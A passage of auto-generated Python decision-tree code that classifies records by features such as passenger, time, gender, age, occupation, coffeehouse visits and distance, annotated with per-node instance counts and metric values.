# {"feature": "Passanger", "instances": 5, "metric_value": 0.4, "depth": 7}
if obj[0]<=1:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 8}
if obj[1]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 9}
if obj[3]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 10}
if obj[6]<=5:
# {"feature": "Coffeehouse", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[9]<=0.0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 797, "metric_value": 0.4734, "depth": 4}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 590, "metric_value": 0.4585, "depth": 5}
if obj[6]<=1:
# {"feature": "Age", "instances": 296, "metric_value": 0.4757, "depth": 6}
if obj[4]>2:
# {"feature": "Occupation", "instances": 192, "metric_value": 0.4847, "depth": 7}
if obj[7]>0:
# {"feature": "Gender", "instances": 184, "metric_value": 0.4827, "depth": 8}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 125, "metric_value": 0.4625, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Passanger", "instances": 95, "metric_value": 0.4844, "depth": 10}
if obj[0]>0:
# {"feature": "Distance", "instances": 86, "metric_value": 0.4949, "depth": 11}
if obj[12]>1:
# {"feature": "Time", "instances": 57, "metric_value": 0.4881, "depth": 12}
if obj[1]<=2:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4974, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4589, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Time", "instances": 29, "metric_value": 0.4713, "depth": 12}
if obj[1]>1:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[1]<=1:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[0]<=0:
# {"feature": "Time", "instances": 9, "metric_value": 0.2667, "depth": 11}
if obj[1]<=2:
# {"feature": "Distance", "instances": 5, "metric_value": 0.4667, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Passanger", "instances": 30, "metric_value": 0.35, "depth": 10}
if obj[0]>0:
# {"feature": "Time", "instances": 28, "metric_value": 0.3673, "depth": 11}
if obj[1]<=3:
# {"feature": "Distance", "instances": 21, "metric_value": 0.3968, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.381, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2286, "depth": 12}
if obj[12]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Time", "instances": 59, "metric_value": 0.4309, "depth": 9}
if obj[1]>0:
# {"feature": "Passanger", "instances": 44, "metric_value": 0.4893, "depth": 10}
if obj[0]<=1:
# {"feature": "Distance", "instances": 36, "metric_value": 0.4715, "depth": 11}
if obj[12]>1:
# {"feature": "Coffeehouse", "instances": 20, "metric_value": 0.4357, "depth": 12}
if obj[9]<=2.0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3929, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Coffeehouse", "instances": 16, "metric_value": 0.4643, "depth": 12}
if obj[9]>1.0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.381, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[0]>1:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.3571, "depth": 11}
if obj[9]<=2.0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.3714, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Distance", "instances": 15, "metric_value": 0.1897, "depth": 10}
if obj[12]<=2:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.1319, "depth": 11}
if obj[9]>1.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2143, "depth": 12}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.25, "depth": 13}
if obj[0]<=0:
return 'True'
elif obj[0]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[9]>2.0:
return 'False'
elif obj[9]<=2.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[7]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.0, "depth": 8}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=2:
# {"feature": "Passanger", "instances": 104, "metric_value": 0.36, "depth": 7}
if obj[0]>0:
# {"feature": "Distance", "instances": 80, "metric_value": 0.3195, "depth": 8}
if obj[12]>1:
# {"feature": "Time", "instances": 50, "metric_value": 0.3572, "depth": 9}
if obj[1]<=1:
# {"feature": "Gender", "instances": 31, "metric_value": 0.233, "depth": 10}
if obj[3]>0:
# {"feature": "Occupation", "instances": 18, "metric_value": 0.3639, "depth": 11}
if obj[7]<=6:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[11]<=0:
# {"feature": "Coffeehouse", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[9]<=1.0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[7]>6:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.125, "depth": 12}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Occupation", "instances": 19, "metric_value": 0.3947, "depth": 10}
if obj[7]>1:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4409, "depth": 11}
if obj[3]>0:
# {"feature": "Coffeehouse", "instances": 11, "metric_value": 0.4364, "depth": 12}
if obj[9]>0.0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[9]>0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
return 'True'
else: return 'True'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Occupation", "instances": 30, "metric_value": 0.17, "depth": 9}
if obj[7]>1:
# {"feature": "Time", "instances": 20, "metric_value": 0.09, "depth": 10}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.175, "depth": 11}
if obj[3]>0:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.2188, "depth": 12}
if obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2188, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Coffeehouse", "instances": 10, "metric_value": 0.2857, "depth": 10}
if obj[9]>0.0:
# {"feature": "Time", "instances": 7, "metric_value": 0.3714, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[3]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
# {"feature": "Occupation", "instances": 24, "metric_value": 0.3175, "depth": 8}
if obj[7]>1:
# {"feature": "Coffeehouse", "instances": 21, "metric_value": 0.3439, "depth": 9}
if obj[9]>-1.0:
# {"feature": "Distance", "instances": 18, "metric_value": 0.3861, "depth": 10}
if obj[12]>1:
# {"feature": "Time", "instances": 10, "metric_value": 0.2857, "depth": 11}
if obj[1]<=3:
# {"feature": "Gender", "instances": 7, "metric_value": 0.381, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Time", "instances": 8, "metric_value": 0.4375, "depth": 11}
if obj[1]>2:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=-1.0:
return 'True'
else: return 'True'
elif obj[7]<=1:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[6]>1:
# {"feature": "Gender", "instances": 294, "metric_value": 0.4196, "depth": 6}
if obj[3]>0:
# {"feature": "Distance", "instances": 149, "metric_value": 0.3531, "depth": 7}
if obj[12]<=2:
# {"feature": "Occupation", "instances": 121, "metric_value": 0.3842, "depth": 8}
if obj[7]>1:
# {"feature": "Time", "instances": 92, "metric_value": 0.4354, "depth": 9}
if obj[1]>0:
# {"feature": "Age", "instances": 63, "metric_value": 0.3917, "depth": 10}
if obj[4]<=6:
# {"feature": "Coffeehouse", "instances": 62, "metric_value": 0.3867, "depth": 11}
if obj[9]<=1.0:
# {"feature": "Passanger", "instances": 34, "metric_value": 0.32, "depth": 12}
if obj[0]>0:
# {"feature": "Direction_same", "instances": 28, "metric_value": 0.2911, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[0]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Direction_same", "instances": 28, "metric_value": 0.4497, "depth": 12}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 27, "metric_value": 0.463, "depth": 13}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>6:
return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Age", "instances": 29, "metric_value": 0.4496, "depth": 10}
if obj[4]<=5:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.4392, "depth": 11}
if obj[11]<=0:
# {"feature": "Coffeehouse", "instances": 17, "metric_value": 0.3832, "depth": 12}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4762, "depth": 13}
if obj[0]<=0:
return 'False'
elif obj[0]>0:
return 'False'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Passanger", "instances": 7, "metric_value": 0.2381, "depth": 13}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Coffeehouse", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[0]<=1:
return 'False'
else: return 'False'
elif obj[9]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>5:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Age", "instances": 29, "metric_value": 0.1352, "depth": 9}
if obj[4]<=6:
# {"feature": "Passanger", "instances": 25, "metric_value": 0.06, "depth": 10}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[1]>0:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[9]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>6:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.0, "depth": 10}
if obj[0]>1:
return 'True'
elif obj[0]<=1:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[12]>2:
# {"feature": "Coffeehouse", "instances": 28, "metric_value": 0.1209, "depth": 8}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Time", "instances": 13, "metric_value": 0.2168, "depth": 9}
if obj[1]>0:
# {"feature": "Age", "instances": 11, "metric_value": 0.1212, "depth": 10}
if obj[4]<=2:
return 'False'
elif obj[4]>2:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[7]>1:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Age", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 145, "metric_value": 0.457, "depth": 7}
if obj[9]<=1.0:
# {"feature": "Occupation", "instances": 106, "metric_value": 0.4315, "depth": 8}
if obj[7]<=8:
# {"feature": "Age", "instances": 61, "metric_value": 0.4659, "depth": 9}
if obj[4]>0:
# {"feature": "Distance", "instances": 48, "metric_value": 0.4238, "depth": 10}
if obj[12]>1:
# {"feature": "Time", "instances": 31, "metric_value": 0.3752, "depth": 11}
if obj[1]<=2:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.3977, "depth": 12}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 22, "metric_value": 0.4273, "depth": 13}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.1429, "depth": 12}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[0]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Time", "instances": 17, "metric_value": 0.4941, "depth": 11}
if obj[1]>0:
# {"feature": "Passanger", "instances": 12, "metric_value": 0.4857, "depth": 12}
if obj[0]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[0]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Time", "instances": 13, "metric_value": 0.3538, "depth": 10}
if obj[1]<=2:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.2143, "depth": 11}
if obj[0]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.1905, "depth": 12}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[12]<=1:
return 'False'
elif obj[12]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[0]<=1:
# {"feature": "Distance", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]<=1:
return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>8:
# {"feature": "Passanger", "instances": 45, "metric_value": 0.3145, "depth": 9}
if obj[0]<=1:
# {"feature": "Age", "instances": 39, "metric_value": 0.2815, "depth": 10}
if obj[4]>1:
# {"feature": "Time", "instances": 25, "metric_value": 0.3575, "depth": 11}
if obj[1]<=1:
# {"feature": "Distance", "instances": 18, "metric_value": 0.3897, "depth": 12}
if obj[12]<=2:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.3538, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[12]>2:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 12}
if obj[12]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=1:
# {"feature": "Time", "instances": 14, "metric_value": 0.1071, "depth": 11}
if obj[1]<=2:
return 'False'
elif obj[1]>2:
# {"feature": "Distance", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[12]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Age", "instances": 6, "metric_value": 0.2222, "depth": 10}
if obj[4]<=2:
return 'True'
elif obj[4]>2:
# {"feature": "Time", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[1]<=3:
return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Age", "instances": 39, "metric_value": 0.4487, "depth": 8}
if obj[4]>0:
# {"feature": "Occupation", "instances": 36, "metric_value": 0.4609, "depth": 9}
if obj[7]>1:
# {"feature": "Distance", "instances": 27, "metric_value": 0.4431, "depth": 10}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4044, "depth": 11}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 16, "metric_value": 0.4167, "depth": 12}
if obj[0]>0:
# {"feature": "Time", "instances": 15, "metric_value": 0.4286, "depth": 13}
if obj[1]<=3:
return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.3111, "depth": 11}
if obj[0]<=1:
# {"feature": "Time", "instances": 9, "metric_value": 0.3333, "depth": 12}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Time", "instances": 9, "metric_value": 0.2963, "depth": 10}
if obj[1]>0:
# {"feature": "Distance", "instances": 6, "metric_value": 0.4, "depth": 11}
if obj[12]>1:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.4667, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[0]>1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Age", "instances": 207, "metric_value": 0.49, "depth": 5}
if obj[4]<=2:
# {"feature": "Coffeehouse", "instances": 107, "metric_value": 0.4728, "depth": 6}
if obj[9]<=3.0:
# {"feature": "Occupation", "instances": 98, "metric_value": 0.4645, "depth": 7}
if obj[7]<=6:
# {"feature": "Time", "instances": 56, "metric_value": 0.4362, "depth": 8}
if obj[1]<=3:
# {"feature": "Passanger", "instances": 50, "metric_value": 0.4174, "depth": 9}
if obj[0]>0:
# {"feature": "Distance", "instances": 46, "metric_value": 0.4451, "depth": 10}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.4, "depth": 11}
if obj[11]<=0:
# {"feature": "Education", "instances": 27, "metric_value": 0.44, "depth": 12}
if obj[6]>0:
# {"feature": "Gender", "instances": 25, "metric_value": 0.435, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Education", "instances": 16, "metric_value": 0.4409, "depth": 11}
if obj[6]>1:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4481, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4857, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 13}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.2667, "depth": 9}
if obj[0]<=1:
# {"feature": "Distance", "instances": 5, "metric_value": 0.0, "depth": 10}
if obj[12]<=1:
return 'True'
elif obj[12]>1:
return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>6:
# {"feature": "Gender", "instances": 42, "metric_value": 0.4505, "depth": 8}
if obj[3]>0:
# {"feature": "Education", "instances": 26, "metric_value": 0.4573, "depth": 9}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.4148, "depth": 10}
if obj[11]<=0:
# {"feature": "Time", "instances": 15, "metric_value": 0.4405, "depth": 11}
if obj[1]<=1:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.4286, "depth": 12}
if obj[0]>0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4762, "depth": 13}
if obj[12]<=2:
return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.381, "depth": 12}
if obj[12]<=1:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.4167, "depth": 13}
if obj[0]<=0:
return 'True'
elif obj[0]>0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.2143, "depth": 10}
if obj[12]<=2:
# {"feature": "Time", "instances": 7, "metric_value": 0.1429, "depth": 11}
if obj[1]<=3:
return 'True'
elif obj[1]>3:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[0]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Passanger", "instances": 16, "metric_value": 0.3, "depth": 9}
if obj[0]<=1:
# {"feature": "Time", "instances": 15, "metric_value": 0.28, "depth": 10}
if obj[1]<=2:
# {"feature": "Education", "instances": 10, "metric_value": 0.1333, "depth": 11}
if obj[6]>0:
return 'True'
elif obj[6]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.0, "depth": 12}
if obj[12]<=2:
return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>2:
# {"feature": "Distance", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[12]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]>0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]>3.0:
# {"feature": "Passanger", "instances": 9, "metric_value": 0.1481, "depth": 7}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
# {"feature": "Time", "instances": 3, "metric_value": 0.3333, "depth": 8}
if obj[1]<=2:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[6]<=3:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[7]<=20:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
